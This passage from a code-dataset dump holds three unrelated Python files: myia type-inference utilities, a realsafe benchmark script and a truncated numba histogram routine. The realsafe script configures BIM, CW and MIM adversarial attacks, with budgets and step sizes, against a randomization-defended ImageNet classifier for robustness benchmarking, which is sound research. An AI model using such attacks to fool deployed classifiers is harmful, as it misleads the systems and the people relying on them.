return all(self(v, *args) for v in x.values())\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractScalar, *args):\n return self(x.values, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: AbstractStructure, *args):\n return all(self(x, *args) for x in xs.children())\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: AbstractAtom, *args):\n return True\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractFunction, *args):\n return self(x.values, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractUnion, *args):\n return self(x.options, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: Possibilities, *args):\n return all(self(v, *args) for v in x)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: AbstractTaggedUnion, *args):\n return self(x.options, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: TaggedPossibilities, *args):\n return all(self(v, *args) for _, v in x)\n\n\n@overload # noqa: F811\ndef abstract_check(self, t: PartialApplication, *args):\n return self(t.fn, *args) and all(self(v, *args) for v in t.args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, t: JTransformedFunction, *args):\n return self(t.fn, *args)\n\n\n@overload # noqa: F811\ndef abstract_check(self, x: Pending, *args):\n return False\n\n\n@overload # noqa: F811\ndef abstract_check(self, xs: object, *args):\n return True\n\n\n###########\n# Cloning #\n###########\n\n\n@dataclass\nclass CloneState:\n \"\"\"State of abstract_clone.\"\"\"\n\n cache: dict\n prop: str\n check: callable\n\n\ndef _make_constructor(inst):\n def f(*args, **kwargs):\n inst.__init__(*args, **kwargs)\n return inst\n return f\n\n\n@overload.wrapper(\n initial_state=lambda: CloneState({}, None, None),\n postprocess=intern,\n)\ndef abstract_clone(__call__, self, x, *args):\n \"\"\"Clone an abstract value.\"\"\"\n def proceed():\n if isinstance(x, AbstractValue) and x in cache:\n return cache[x]\n result = __call__(self, x, *args)\n if not isinstance(result, GeneratorType):\n return result\n cls = result.send(None)\n if cls is not None:\n inst = cls.empty()\n else:\n inst = None\n constructor = _make_constructor(inst)\n cache[x] = inst\n try:\n result.send(constructor)\n except StopIteration as e:\n if inst is not None:\n assert e.value is inst\n return e.value\n else:\n raise AssertionError(\n 'Generators in abstract_clone must yield once, then 
return.'\n )\n\n cache = self.state.cache\n prop = self.state.prop\n if prop:\n if hasattr(x, prop):\n return getattr(x, prop)\n elif isinstance(x, AbstractValue):\n if self.state.check(x, *args):\n res = x\n else:\n res = proceed()\n setattr(x, prop, res)\n return res\n else:\n return proceed()\n elif self.state.check and self.state.check(x, *args):\n return x\n else:\n return proceed()\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractScalar, *args):\n return AbstractScalar(self(x.values, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractFunction, *args):\n return (yield AbstractFunction)(value=self(x.get_sync(), *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, d: TrackDict, *args):\n return {k: k.clone(v, self) for k, v in d.items()}\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractTuple, *args):\n return (yield AbstractTuple)(\n [self(y, *args) for y in x.elements],\n self(x.values, *args)\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractDict, *args):\n return (yield AbstractDict)(dict((k, self(v, *args))\n for k, v in x.entries.items()))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractArray, *args):\n return (yield type(x))(self(x.element, *args), self(x.values, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractClassBase, *args):\n return (yield type(x))(\n x.tag,\n {k: self(v, *args) for k, v in x.attributes.items()},\n values=self(x.values, *args),\n constructor=x.constructor\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractUnion, *args):\n return (yield AbstractUnion)(self(x.options, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractTaggedUnion, *args):\n return (yield AbstractTaggedUnion)(self(x.options, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractJTagged, *args):\n return (yield AbstractJTagged)(self(x.element, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: AbstractKeywordArgument, *args):\n return (yield AbstractKeywordArgument)(\n x.key,\n self(x.argument, *args)\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: Possibilities, *args):\n return Possibilities([self(v, *args) for v in x])\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: TaggedPossibilities, *args):\n return TaggedPossibilities([[i, self(v, *args)] for i, v in x])\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: PartialApplication, *args):\n return PartialApplication(\n self(x.fn, *args),\n [self(arg, *args) for arg in x.args]\n )\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: JTransformedFunction, *args):\n return JTransformedFunction(self(x.fn, *args))\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: Pending, *args):\n if x.done():\n return self(x.result(), *args)\n else:\n return x\n\n\n@overload # noqa: F811\ndef abstract_clone(self, x: object, *args):\n return x\n\n\n##############\n# Concretize #\n##############\n\n\n@abstract_clone.variant(\n initial_state=lambda: CloneState({}, '_concrete', abstract_check)\n)\ndef concretize_abstract(self, x: Pending):\n \"\"\"Clone an abstract value while resolving all Pending (synchronous).\"\"\"\n if x.done():\n return self(x.result())\n else:\n raise AssertionError('Unresolved Pending', x)\n\n\n###############\n# Broad check #\n###############\n\n\n@abstract_check.variant(\n initial_state=lambda: CheckState(cache={}, prop='_broad')\n)\ndef _is_broad(self, x: object, *args):\n return x is ANYTHING\n\n\n@overload # 
noqa: F811\ndef _is_broad(self, x: (AbstractScalar, AbstractFunction), *args):\n return self(x.xvalue(), *args)\n\n\n###########\n# Broaden #\n###########\n\n\n@abstract_clone.variant(\n initial_state=lambda: CloneState({}, '_broad', _is_broad)\n)\ndef broaden(self, d: TrackDict, *args):\n \"\"\"Broaden an abstract value.\n\n * Concrete values such as 1 or True will be broadened to ANYTHING.\n\n Arguments:\n d: The abstract data to clone.\n \"\"\"\n return {k: k.broaden(v, self, *args) for k, v in d.items()}\n\n\n###################\n# Tentative check #\n###################\n\n\n@_is_broad.variant(\n initial_state=lambda: CheckState(cache={}, prop=None)\n)\ndef _is_tentative(self, x: (Possibilities, TaggedPossibilities), loop):\n return False\n\n\n#############\n# Tentative #\n#############\n\n\n@broaden.variant(\n initial_state=lambda: CloneState({}, None, _is_tentative)\n)\ndef tentative(self, p: Possibilities, loop):\n \"\"\"Broaden an abstract value and make it tentative.\n\n * Concrete values such as 1 or True will be broadened to ANYTHING.\n * Possibilities will be broadened to PendingTentative. This allows\n us to avoid resolving them earlier than we would like.\n\n Arguments:\n d: The abstract data to clone.\n loop: The InferenceLoop, used to broaden Possibilities.\n \"\"\"\n return loop.create_pending_tentative(tentative=p)\n\n\n@overload # noqa: F811\ndef tentative(self, p: TaggedPossibilities, loop):\n return loop.create_pending_tentative(tentative=p)\n\n\n###############\n# Sensitivity #\n###############\n\n\n@abstract_clone.variant\ndef sensitivity_transform(self, x: AbstractFunction):\n \"\"\"Return an abstract value for the sensitivity of x.\n\n * The sensitivity of a function is an Env\n * The sensitivity of J(x) is x\n \"\"\"\n return AbstractScalar({\n VALUE: ANYTHING,\n TYPE: xtype.EnvType,\n })\n\n\n@overload # noqa: F811\ndef sensitivity_transform(self, x: AbstractJTagged):\n return self(x.element)\n\n\n#################\n# Force through #\n#################\n\n\nasync def _force_through_post(x):\n return intern(await x)\n\n\n@overload.wrapper(\n initial_state=lambda: {},\n postprocess=_force_through_post,\n)\nasync def force_through(__call__, self, x, through):\n \"\"\"Clone an abstract value (asynchronous).\"\"\"\n if not isinstance(x, through) and not isinstance(x, Pending):\n return x\n cache = self.state\n if isinstance(x, AbstractValue) and x in cache:\n return cache[x]\n\n call = __call__(self, x, through)\n if isinstance(call, AsyncGeneratorType):\n cls = await call.asend(None)\n inst = cls.empty()\n cache[x] = inst\n constructor = _make_constructor(inst)\n rval = await call.asend(constructor)\n assert rval is inst\n return rval\n else:\n return await call\n\n\n# Uncomment and test the other implementations if/when needed:\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: AbstractScalar, through):\n# return AbstractScalar(await self(x.values, through))\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: AbstractFunction, through):\n# yield (yield AbstractFunction)(*(await self(x.get_sync(), through)))\n\n\n# @overload # noqa: F811\n# async def force_through(self, d: TrackDict, through):\n# return {k: await self(v, through) for k, v in d.items()}\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractTuple, through):\n yield (yield AbstractTuple)(\n [(await self(y, through)) for y in x.elements],\n await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractArray, 
through):\n yield (yield type(x))(await self(x.element, through),\n await self(x.values, through))\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractClassBase, through):\n yield (yield type(x))(\n x.tag,\n {k: (await self(v, through)) for k, v in x.attributes.items()},\n values=await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractDict, through):\n yield (yield AbstractDict)(\n {k: (await self(v, through)) for k, v in x.entries.items()},\n await self(x.values, through)\n )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractUnion, through):\n yield (yield AbstractUnion)(await self(x.options, through))\n\n\n@overload # noqa: F811\nasync def force_through(self, x: AbstractTaggedUnion, through):\n opts = await self(x.options, through)\n yield (yield AbstractTaggedUnion)(opts)\n\n\n@overload # noqa: F811\nasync def force_through(self, x: Possibilities, through):\n return Possibilities([await self(v, through) for v in x])\n\n\n@overload # noqa: F811\nasync def force_through(self, x: TaggedPossibilities, through):\n return TaggedPossibilities([[i, await self(v, through)] for i, v in x])\n\n\n# @overload # noqa: F811\n# async def force_through(self, x: PartialApplication, through):\n# return PartialApplication(\n# await self(x.fn, through),\n# [await self(arg, through) for arg in x.args]\n# )\n\n\n@overload # noqa: F811\nasync def force_through(self, x: Pending, through):\n return await self(await x, through)\n\n\n############\n# Nobottom #\n############\n\n\n@abstract_check.variant\ndef nobottom(self, x: AbstractBottom):\n \"\"\"Check whether bottom appears anywhere in this type.\"\"\"\n return False\n\n\n@overload # noqa: F811\ndef nobottom(self, x: Pending, *args):\n return True\n\n\n#########\n# Merge #\n#########\n\n\n@overload.wrapper(\n bootstrap=True,\n initial_state=dict\n)\ndef amerge(__call__, self, x1, x2, forced=False, bind_pending=True,\n accept_pending=True):\n \"\"\"Merge two values.\n\n If forced is False, amerge will return a superset of x1 and x2, if it\n exists.\n\n If the forced argument is True, amerge will either return x1 or fail.\n This makes a difference in some situations:\n\n * amerge(1, 2, forced=False) => ANYTHING\n * amerge(1, 2, forced=True) => Error\n * amerge(ANYTHING, 1234, forced=True) => ANYTHING\n * amerge(1234, ANYTHING, forced=True) => Error\n\n Arguments:\n x1: The first value to merge\n x2: The second value to merge\n forced: Whether we are already committed to returning x1 or not.\n bind_pending: Whether we bind two Pending, unresolved values.\n accept_pending: Works the same as bind_pending, but only for the\n top level call.\n \"\"\"\n if x1 is x2:\n return x1\n\n keypair = (id(x1), id(x2))\n if keypair in self.state:\n result = self.state[keypair]\n if result is ABSENT:\n # Setting forced=True will set the keypair to x1 (and then check\n # that x1 and x2 are compatible under forced=True), which lets us\n # return a result for self-referential data.\n return amerge(x1, x2, forced=True,\n bind_pending=bind_pending,\n accept_pending=accept_pending)\n else:\n return result\n\n def helper():\n nonlocal x1, x2\n while isinstance(x1, Pending) and x1.done() and not forced:\n x1 = x1.result()\n while isinstance(x2, Pending) and x2.done():\n x2 = x2.result()\n isp1 = isinstance(x1, Pending)\n isp2 = isinstance(x2, Pending)\n loop = x1.get_loop() if isp1 else x2.get_loop() if isp2 else None\n if isinstance(x1, PendingTentative):\n new_tentative = self(x1.tentative, x2, False, 
True, bind_pending)\n assert not isinstance(new_tentative, Pending)\n x1.tentative = new_tentative\n return x1\n if isinstance(x2, PendingTentative):\n new_tentative = self(x1, x2.tentative, forced,\n bind_pending, accept_pending)\n assert not isinstance(new_tentative, Pending)\n x2.tentative = new_tentative\n return new_tentative if forced else x2\n if (isp1 or isp2) and (not accept_pending or not bind_pending):\n if forced and isp1:\n raise MyiaTypeError('Cannot have Pending here.')\n if isp1:\n def chk(a):\n return self(a, x2, forced, bind_pending)\n return find_coherent_result_sync(x1, chk)\n if isp2:\n def chk(a):\n return self(x1, a, forced, bind_pending)\n return find_coherent_result_sync(x2, chk)\n if isp1 and isp2:\n return bind(loop, x1 if forced else None, [], [x1, x2])\n elif isp1:\n return bind(loop, x1 if forced else None, [x2], [x1])\n elif isp2:\n return bind(loop, x1 if forced else None, [x1], [x2])\n elif isinstance(x2, AbstractBottom): # pragma: no cover\n return x1\n elif isinstance(x1, AbstractBottom):\n if forced: # pragma: no cover\n # I am not sure how to trigger this\n raise TypeMismatchError(x1, x2)\n return x2\n elif x1 is ANYTHING:\n return x1\n elif x2 is ANYTHING:\n if forced:\n raise TypeMismatchError(x1, x2)\n return x2\n elif (type(x1) is not type(x2)\n and not isinstance(x1, (int, float, bool))):\n raise MyiaTypeError(\n f'Type mismatch: {type(x1)} != {type(x2)}; {x1} != {x2}'\n )\n else:\n return self.map[type(x1)](self, x1, x2, forced, bind_pending)\n\n self.state[keypair] = x1 if forced else ABSENT\n rval = helper()\n self.state[keypair] = rval\n if forced:\n assert rval is x1\n return rval\n\n\n@overload # noqa: F811\ndef amerge(self, x1: Possibilities, x2, forced, bp):\n if set(x1).issuperset(set(x2)):\n return x1\n if forced:\n raise MyiaTypeError(\n 'Additional Possibilities cannot be merged.'\n )\n else:\n return Possibilities(x1 + x2)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: TaggedPossibilities, x2, forced, bp):\n d1 = dict(x1)\n d2 = dict(x2)\n results = {}\n for i, t in d1.items():\n if i in d2:\n t = self(t, d2[i], forced, bp)\n results[i] = t\n for i, t in d2.items():\n if i not in d1:\n results[i] = t\n res = TaggedPossibilities(results.items())\n if res == x1:\n return x1\n elif forced:\n raise MyiaTypeError(\n 'Additional TaggedPossibilities cannot be merged.'\n )\n elif res == x2:\n return x2\n else:\n return res\n\n\n@overload # noqa: F811\ndef amerge(self, x1: xtype.TypeMeta, x2, forced, bp):\n if issubclass(x2, x1):\n return x1\n elif not forced and issubclass(x1, x2):\n return x2\n else:\n raise TypeMismatchError(x1, x2)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: TrackDict, x2, forced, bp):\n keys = {*x1.keys(), *x2.keys()}\n rval = type(x1)()\n changes = False\n for k in keys:\n if k in x1:\n v1 = x1[k]\n else:\n v1 = k.default()\n changes = True\n v2 = x2[k] if k in x2 else k.default()\n res = k.merge(self, v1, v2, forced, bp)\n if res is not v1:\n changes = True\n if res is not ABSENT:\n rval[k] = res\n if forced and changes and rval != x1:\n raise MyiaTypeError('Cannot merge tracks')\n return x1 if forced or not changes else rval\n\n\n@overload # noqa: F811\ndef amerge(self, x1: dict, x2, forced, bp):\n if set(x1.keys()) != set(x2.keys()):\n raise MyiaTypeError(f'Keys mismatch')\n changes = False\n rval = type(x1)()\n for k, v in x1.items():\n res = self(v, x2[k], forced, bp)\n if res is not v:\n changes = True\n rval[k] = res\n return x1 if forced or not changes else rval\n\n\n@overload # noqa: F811\ndef 
amerge(self, x1: (tuple, list), x2, forced, bp):\n if len(x1) != len(x2): # pragma: no cover\n raise MyiaTypeError(f'Tuple length mismatch')\n changes = False\n rval = []\n for v1, v2 in zip(x1, x2):\n res = self(v1, v2, forced, bp)\n if res is not v1:\n changes = True\n rval.append(res)\n return x1 if forced or not changes else type(x1)(rval)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractScalar, x2, forced, bp):\n values = self(x1.values, x2.values, forced, bp)\n if forced or values is x1.values:\n return x1\n return AbstractScalar(values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractError, x2, forced, bp):\n e1 = x1.xvalue()\n e2 = x2.xvalue()\n e = self(e1, e2, forced, bp)\n if forced or e is e1:\n return x1\n return AbstractError(e)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractFunction, x2, forced, bp):\n values = self(x1.get_sync(), x2.get_sync(), forced, bp)\n if forced or values is x1.values:\n return x1\n return AbstractFunction(*values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractTuple, x2, forced, bp):\n args1 = (x1.elements, x1.values)\n args2 = (x2.elements, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractTuple(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractArray, x2, forced, bp):\n args1 = (x1.element, x1.values)\n args2 = (x2.element, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractArray(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractClassBase, x2, forced, bp):\n args1 = (x1.tag, x1.attributes, x1.values)\n args2 = (x2.tag, x2.attributes, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n tag, attrs, values = merged\n return type(x1)(tag, attrs, values=values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractDict, x2, forced, bp):\n args1 = (x1.entries, x1.values)\n args2 = (x2.entries, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return type(x1)(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractJTagged, x2, forced, bp):\n args1 = x1.element\n args2 = x2.element\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractJTagged(merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: (AbstractUnion, AbstractTaggedUnion),\n x2, forced, bp):\n args1 = x1.options\n args2 = x2.options\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return type(x1)(merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: (int, float, bool), x2, forced, bp):\n if forced and x1 != x2:\n raise TypeMismatchError(x1, x2)\n return x1 if x1 == x2 else ANYTHING\n\n\n@overload # noqa: F811\ndef amerge(self, x1: object, x2, forced, bp):\n if x1 != x2:\n raise TypeMismatchError(x1, x2)\n return x1\n\n\ndef bind(loop, committed, resolved, pending):\n \"\"\"Bind Pendings together.\n\n Arguments:\n loop: The InferenceLoop.\n committed: Either None, or an abstract value that we are already\n committed to, which will force the merge to return that value.\n resolved: A set of Pendings that have already been resolved.\n pending: A set of unresolved Pendings.\n \"\"\"\n def amergeall():\n if committed is None:\n v = reduce(lambda x1, x2: amerge(x1, x2,\n forced=False,\n accept_pending=False),\n resolved)\n else:\n v = reduce(lambda x1, x2: amerge(x1, x2,\n forced=True,\n 
accept_pending=False),\n resolved, committed)\n return v\n\n resolved = list(resolved)\n pending = set(pending)\n assert pending\n\n def resolve(fut):\n nonlocal committed\n pending.remove(fut)\n result = fut.result()\n if fut is committed:\n committed = result\n resolved.append(result)\n if not pending:\n v = amergeall()\n if merged is not None and not merged.done():\n merged.set_result(v)\n\n for p in pending:\n p.add_done_callback(resolve)\n\n def premature_resolve():\n # This is what force_resolve() on the result will do\n nonlocal committed\n # We merge what we have so far\n committed = amergeall()\n # We broaden the result so that the as-of-yet unresolved stuff\n # can be merged more easily.\n committed = tentative(committed, loop)\n resolved.clear()\n return committed\n\n def priority():\n # Cannot force resolve unless we have at least one resolved Pending\n if not resolved and committed is None:\n return None\n if any(is_simple(x) for x in chain([committed], resolved, pending)):\n return 1000\n elif any(not nobottom(x) for x in resolved):\n # Bottom is always lower-priority\n return None\n else:\n return -1000\n\n if any(is_simple(x) for x in chain(resolved, pending)):\n # merged = None because we will not make a new Pending\n merged = None\n\n if pending:\n p, *rest = pending\n p.equiv.update(resolved)\n for p2 in rest:\n p.tie(p2)\n\n if resolved:\n rval = resolved[0]\n else:\n for p in pending:\n if is_simple(p):\n rval = p\n break\n else:\n raise AssertionError('unreachable')\n\n else:\n merged = loop.create_pending(\n resolve=premature_resolve,\n priority=priority,\n )\n merged.equiv.update(resolved)\n for p in pending:\n merged.tie(p)\n rval = merged\n\n if committed is None:\n return rval\n else:\n return committed\n\n\n###########################\n# Typing-related routines #\n###########################\n\n\ndef collapse_options(options):\n \"\"\"Collapse a list of options, some of which may be AbstractUnions.\"\"\"\n opts = []\n todo = list(options)\n while todo:\n option = todo.pop()\n if isinstance(option, AbstractUnion):\n todo.extend(option.options)\n else:\n opts.append(option)\n opts = Possibilities(opts)\n return opts\n\n\ndef union_simplify(options, constructor=AbstractUnion):\n \"\"\"Simplify a list of options.\n\n Returns:\n * None, if there are no options.\n * A single type, if there is one option.\n * An AbstractUnion.\n\n \"\"\"\n options = collapse_options(options)\n if len(options) == 0:\n return None\n elif len(options) == 1:\n return options.pop()\n else:\n return constructor(options)\n\n\ndef typecheck(model, abstract):\n \"\"\"Check that abstract matches the model.\"\"\"\n try:\n amerge(model, abstract, forced=True, bind_pending=False)\n except MyiaTypeError:\n return False\n else:\n return True\n\n\ndef split_type(t, model):\n \"\"\"Checks t against the model and return matching/non-matching subtypes.\n\n * If t is a Union, return a Union that fully matches model, and a Union\n that does not match model. 
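collapse_options above is a standard worklist flattening; a minimal standalone analogue, using plain tuples as stand-ins for nested AbstractUnions, behaves the same way:

```python
def flatten_options(options):
    opts, todo = [], list(options)
    while todo:
        option = todo.pop()
        if isinstance(option, tuple):   # a tuple plays the role of a nested union
            todo.extend(option)
        else:
            opts.append(option)
    return opts

assert sorted(flatten_options([1, (2, (3, 4)), 5])) == [1, 2, 3, 4, 5]
```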
No matches in either case returns None for\n that case.\n * Otherwise, return (t, None) or (None, t) depending on whether t matches\n the model.\n \"\"\"\n if isinstance(t, AbstractUnion):\n matching = [(opt, typecheck(model, opt))\n for opt in set(t.options)]\n t1 = union_simplify(opt for opt, m in matching if m)\n t2 = union_simplify(opt for opt, m in matching if not m)\n return t1, t2\n elif typecheck(model, t):\n return t, None\n else:\n return None, t\n\n\ndef hastype_helper(value, model):\n \"\"\"Helper to implement hastype.\"\"\"\n if isinstance(model, AbstractUnion):\n results = [hastype_helper(value, opt) for opt in model.options]\n if any(r is True for r in results):\n return True\n elif all(r is False for r in results):\n return False\n else:\n return ANYTHING\n else:\n match, nomatch = split_type(value, model)\n if match is None:\n return False\n elif nomatch is None:\n return True\n else:\n return ANYTHING\n\n\n#########################\n# ADT-related utilities #\n#########################\n\n\ndef normalize_adt(x):\n \"\"\"Normalize the ADT to make it properly recursive.\"\"\"\n rval = _normalize_adt_helper(x, {}, {})\n rval = rval.intern()\n rval = broaden(rval)\n rval = _finalize_adt(rval)\n return rval\n\n\ndef _normalize_adt_helper(x, done, tag_to_adt):\n if x in done:\n return done[x]\n if isinstance(x, AbstractADT):\n if x.tag not in tag_to_adt:\n adt = AbstractADT.new(\n x.tag,\n {k: AbstractUnion.new([]) for k in x.attributes},\n )\n tag_to_adt = {**tag_to_adt, x.tag: adt}\n else:\n adt = tag_to_adt[x.tag]\n done[x] = adt\n for attr, value in x.attributes.items():\n value = _normalize_adt_helper(value, done, tag_to_adt)\n adt.attributes[attr] = union_simplify(\n [adt.attributes[attr], value],\n constructor=AbstractUnion.new\n )\n return adt\n elif isinstance(x, AbstractUnion):\n opts = _normalize_adt_helper(x.options, done, tag_to_adt)\n rval = union_simplify(opts, constructor=AbstractUnion.new)\n done[x] = rval\n return rval\n elif isinstance(x, Possibilities):\n return [_normalize_adt_helper(opt, done, tag_to_adt) for opt in x]\n else:\n return x\n\n\n@abstract_clone.variant\ndef _finalize_adt(self, x: AbstractUnion):\n x = union_simplify(x.options)\n if isinstance(x, AbstractUnion):\n return (yield AbstractUnion)(self(x.options))\n else:\n yield None\n return self(x)\n","sub_path":"myia/abstract/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":35037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"425964277","text":"from realsafe.dataset.ImageNet import load_batches_imagenet_test\nfrom realsafe.benchmark.utils import imagenet_iteration_benchmark_parser\nfrom realsafe.benchmark.iteration_benchmark import IterationBenchmarkBuilder\nfrom realsafe.ImageNet.randomization import Randomization_Inception_v3\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nBATCH_SIZE = 50\n\nSESSION = tf.Session()\n\nargs = imagenet_iteration_benchmark_parser()\n\nMODEL = Randomization_Inception_v3()\nprint('x_min={}\\nx_max={}\\nx_shape={}\\nn_class={}'.format(\n MODEL.x_min, MODEL.x_max, MODEL.x_shape, MODEL.n_class))\nLABEL_OFFSET = MODEL.n_class - 1000\n\nITERATION = 100\n\nMAGNITUDE_L_INF = 16.0 / 255.0\nALPHA_L_INF = 2.0 / 255.0\nSPSA_LR_L_INF = ALPHA_L_INF\n\nMAGNITUDE_L_2 = np.sqrt(1e-3 * np.prod(MODEL.x_shape))\nMAGNITUDE_L_2 *= MODEL.x_max - MODEL.x_min\nALPHA_L_2 = MAGNITUDE_L_2 * 0.15\nSPSA_LR_L_2 = 0.01\n\nMODEL.load(session=SESSION)\n\nbuilder = 
IterationBenchmarkBuilder()\n\nbuilder.config_init_l_inf('bim', {})\nbuilder.config_l_inf('bim', {\n 'magnitude': MAGNITUDE_L_INF,\n 'alpha': ALPHA_L_INF,\n 'session': SESSION,\n})\nbuilder.config_init_l_2('bim', {})\nbuilder.config_l_2('bim', {\n 'magnitude': MAGNITUDE_L_2,\n 'alpha': ALPHA_L_2,\n 'session': SESSION,\n})\n\n\nbuilder.config_init_l_inf('cw', {\n 'confidence': 1e-6,\n 'learning_rate': 1e-2,\n})\nbuilder.config_l_inf('cw', {\n 'cs': 1e-3,\n 'search_steps': 4,\n 'binsearch_steps': 10,\n})\nbuilder.config_init_l_2('cw', {\n 'confidence': 1e-6,\n 'learning_rate': 1e-2,\n})\nbuilder.config_l_2('cw', {\n 'cs': 1.0,\n 'search_steps': 2,\n 'binsearch_steps': 10,\n})\n\n\nbuilder.config_init_l_inf('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_inf('mim', {\n 'magnitude': MAGNITUDE_L_INF,\n 'alpha': ALPHA_L_INF,\n 'session': SESSION,\n})\nbuilder.config_init_l_2('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_2('mim', {\n 'magnitude': MAGNITUDE_L_2,\n 'alpha': ALPHA_L_2,\n 'session': SESSION,\n})\n\n\nbuilder.iteration(ITERATION)\nbuilder.batch_size(BATCH_SIZE)\nbuilder.no_batch_pred(True)\n\nbenchmark = builder.build(SESSION, MODEL,\n args.method, args.goal, args.distance_metric)\n\nos.makedirs(args.output_dir, exist_ok=True)\n\nfor count, (filenames, xs, ys, ys_target) in enumerate(\n load_batches_imagenet_test(\n batch_size=BATCH_SIZE, x_min=MODEL.x_min, x_max=MODEL.x_max,\n x_shape=MODEL.x_shape, x_dtype=MODEL.x_dtype, y_dtype=MODEL.y_dtype,\n start=0, end=1000, label_offset=LABEL_OFFSET,\n return_target_class=True)):\n print(count * BATCH_SIZE, (count + 1) * BATCH_SIZE)\n output_filename = os.path.join(args.output_dir, '%d_rs.npy' % count)\n rs = benchmark.run(xs, ys, ys_target)\n np.save(output_filename, rs)\n\nSESSION.close()\n","sub_path":"benchmark-v2/imagenet_rand_iteration.py","file_name":"imagenet_rand_iteration.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83561468","text":"import numpy as np\nfrom numba import njit\nfrom numba import float32, uint8\n\n\nHISTOGRAM_DTYPE = np.dtype([\n ('sum_gradients', np.float32),\n ('sum_hessians', np.float32),\n ('count', np.uint32),\n])\n\n\n@njit(fastmath=True)\ndef _build_histogram_naive(n_bins, sample_indices, binned_feature,\n ordered_gradients, ordered_hessians):\n histogram = np.zeros(n_bins, dtype=HISTOGRAM_DTYPE)\n for i, sample_idx in enumerate(sample_indices):\n bin_idx = binned_feature[sample_idx]\n histogram[bin_idx]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_idx]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_idx]['count'] += 1\n return histogram\n\n\n@njit(fastmath=True)\ndef build_histogram(n_bins, sample_indices, binned_feature,\n ordered_gradients, ordered_hessians):\n histogram = np.zeros(n_bins, dtype=HISTOGRAM_DTYPE)\n n_node_samples = sample_indices.shape[0]\n unrolled_upper = (n_node_samples // 4) * 4\n\n for i in range(0, unrolled_upper, 4):\n bin_0 = binned_feature[sample_indices[i]]\n bin_1 = binned_feature[sample_indices[i + 1]]\n bin_2 = binned_feature[sample_indices[i + 2]]\n bin_3 = binned_feature[sample_indices[i + 3]]\n\n histogram[bin_0]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_1]['sum_gradients'] += ordered_gradients[i + 1]\n histogram[bin_2]['sum_gradients'] += ordered_gradients[i + 2]\n histogram[bin_3]['sum_gradients'] += ordered_gradients[i + 3]\n\n histogram[bin_0]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_1]['sum_hessians'] += 
